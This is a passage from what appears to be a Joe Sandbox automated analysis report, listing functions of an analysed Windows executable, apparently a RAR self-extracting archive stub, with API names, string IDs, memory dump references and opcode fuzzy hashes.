                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                      • Instruction ID: 49ce06409514fbb77d2cbdf61de80e1788c87b344144e8bbf6959b90fa124d6c
                                      • Opcode Fuzzy Hash: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                      • Instruction Fuzzy Hash: A7312762B10A518EEB04CFB5E8801AC7770FF1875CB58502AEE4EE7A58EF38D895C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3678D8 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: .rar$exe$rar$sfx
                                      • API String ID: 3668304517-630704357
                                      • Opcode ID: f7e8776bebfea627073bc17617381cc0f273a4aee0f23fed37c477de479a6e90
                                      • Instruction ID: 90e73c860e02a6b08b27fc53084da5b6c4c064a41abd051e846d4977e7b58e71
                                      • Opcode Fuzzy Hash: f7e8776bebfea627073bc17617381cc0f273a4aee0f23fed37c477de479a6e90
                                      • Instruction Fuzzy Hash: 68A1E422A14A4240EB049F25D8452BC2B61FF84B9CF985276CE1EE77E9DF3CE581C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A385C68 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: abort$CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 2889003569-2084237596
                                      • Opcode ID: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                      • Instruction ID: ff69936875aa08891f57563e678909cc939cf2c109f6590e479224eec286065f
                                      • Opcode Fuzzy Hash: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                      • Instruction Fuzzy Hash: 80918073A09B828AE710CB65E8502AD7BA0FB4478CF18417AEE8DE7B55DF38D195C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A384F00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm$f
                                      • API String ID: 2395640692-629598281
                                      • Opcode ID: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                      • Instruction ID: 003c675413d27b5626b3ac30b41c822a7f1724c5408b5a1b03ad58536ea31db0
                                      • Opcode Fuzzy Hash: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                      • Instruction Fuzzy Hash: 3851D172A1A6038AEB54CF21E454A29B795FF40B8CF588174DE1EE7788DF79E841C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35CEF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 2102711378-639343689
                                      • Opcode ID: 2d61f48e4c913df30e3353f33d0da5b87e2c753f517db7d0e57962c29196d97f
                                      • Instruction ID: 27f876e7e810e9089aee00d79931f778d142ea283ec6c1e28ef8ae7014eb00c8
                                      • Opcode Fuzzy Hash: 2d61f48e4c913df30e3353f33d0da5b87e2c753f517db7d0e57962c29196d97f
                                      • Instruction Fuzzy Hash: 4651D262F0974285FA10DB69D8412BD67A1AF897ECF0801B1DE5DF36A6DF3CE885C210
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A377AA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Window$Show$Rect
                                      • String ID: RarHtmlClassName
                                      • API String ID: 2396740005-1658105358
                                      • Opcode ID: 4e548477031c14a7251255e9d330dc60e120dd1539dff70d7855af105dc2f50a
                                      • Instruction ID: c9b621ee0dec156f491d58b08a6f69f38f9391f0ff33c94a22a43fdee08a77b5
                                      • Opcode Fuzzy Hash: 4e548477031c14a7251255e9d330dc60e120dd1539dff70d7855af105dc2f50a
                                      • Instruction Fuzzy Hash: 9D51E322A09B828AEB249F25F44437A67A1FF88B88F184171DE8ED7B55DF3CE1058700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37FC8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 3540648995-3493335439
                                      • Opcode ID: 0be8ce0403185fc1deac6cdf8be0278e7ad32d04fc55896583981b8fcfcf6579
                                      • Instruction ID: c7a5e0a854af2dbdb333c3eb5c5669cc7fa08d06f702ff6b904cdb1be9b79913
                                      • Opcode Fuzzy Hash: 0be8ce0403185fc1deac6cdf8be0278e7ad32d04fc55896583981b8fcfcf6579
                                      • Instruction Fuzzy Hash: ED316B62E14B1684EB04CF69E8851AC2371FF88B9CF581175DE5DE7BA9DE38E182C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37FE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                      • Instruction ID: c739437baf20b0adbdd26c9bd0f57bcf7364ba0bd180e16c2093ed49e85941b9
                                      • Opcode Fuzzy Hash: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                      • Instruction Fuzzy Hash: 6821D460A0AF4BC1FA108B19E84417427A2FF49B8CF5C06B6D98DE7261DE3CE686C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38BF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                      • Instruction ID: 672a6ca8647d815a1915b548f84e926b65872337f9183031beda21d559dbecca
                                      • Opcode Fuzzy Hash: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                      • Instruction Fuzzy Hash: F3F06261A2AA4385EF448F11F54027D6760EFC8798F4C1076E94FD6664DF3CD585C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A394540 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                      • Instruction ID: d0417a80ff2f69e3de459f963cea1f2bec7be717d49e081907dab939c6bf1a80
                                      • Opcode Fuzzy Hash: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                      • Instruction Fuzzy Hash: 7681ED62E186568DFB609F659A806BD27A0BF44B8CF0842B5CE0EE3795CF3CE445C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A363AB8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2398171386-0
                                      • Opcode ID: 0409cd116d85bacbe2180f28ba98f9a497d20aba58dbcceb72ddb26471a66f34
                                      • Instruction ID: f928f12688fe82ef7aa181b3b0de355e7eeed8244b96ca1e700e571b72595be5
                                      • Opcode Fuzzy Hash: 0409cd116d85bacbe2180f28ba98f9a497d20aba58dbcceb72ddb26471a66f34
                                      • Instruction Fuzzy Hash: 1751B122F08A4259FB54CFB5E4402BD67B1AF897ACF084675EE1DE77D8EE3890598300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A393EB4 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3659116390-0
                                      • Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                      • Instruction ID: 96a6e67f4a3bba65fe8b86b62a441c6d014a72587dd4a9fd3d699795ebf9ee11
                                      • Opcode Fuzzy Hash: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                      • Instruction Fuzzy Hash: 7F517B62A18A5289E710CF65E5443ACBBB4BB44B98F088175DE4EE7B98DF38D545C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A381D80 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: 5883cc27a293ff30a1e7e682c7b1825e7353ebae92c9f477f46e4879092f6a47
                                      • Instruction ID: cf3126deb62c01e4fc6f10b0c148e7ca2e5c26dc3984d02e3f79b070ebcfcf46
                                      • Opcode Fuzzy Hash: 5883cc27a293ff30a1e7e682c7b1825e7353ebae92c9f477f46e4879092f6a47
                                      • Instruction Fuzzy Hash: E0418E22A0AB4789EB549F61E5003B926D1FF44BA8F1C4674EA6DE6BD5DF3CE1818340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38F394 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                      • Instruction ID: 7abc01f2f4b3bbdd9d298780f5c9540b37b240c7bb85f5d510cd72bfa05e2a87
                                      • Opcode Fuzzy Hash: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                      • Instruction Fuzzy Hash: B2410622B0AA4382FE159F26A9015756396BF44FE8F1D8576DD1EEB785EF3CE4408300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A395658 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction ID: fe87f0687010391227d0c12977c58604e7247218e6380a90c86c61cbb487d2ba
                                      • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction Fuzzy Hash: 2011C636E5CA030DF6D41D28E7823B911416F553B8F5D56B4EA6EE75D6CE2CA4CC4201
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37FDA4 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                      • String ID:
                                      • API String ID: 3621893840-0
                                      • Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                      • Instruction ID: a13182549fa107cc6500b619b0267893a2604b211cf6a8828185d7d5da0ce160
                                      • Opcode Fuzzy Hash: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                      • Instruction Fuzzy Hash: 57F06221B3895A83F7508B24E495F762252FFE4709F685170E64FD19A4DF2CD149C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3861DC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_recordabort
                                      • String ID: csm$csm
                                      • API String ID: 746414643-3733052814
                                      • Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                      • Instruction ID: 38516c5a5dca9fa3694642deb10b004450b543147e815bb9b1527a269041d52c
                                      • Opcode Fuzzy Hash: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                      • Instruction Fuzzy Hash: A071A07250A6928ADB608F25905077DBBA0EF45F8DF0881B5EE8CE7A89DF3CD591C701
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A388074 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
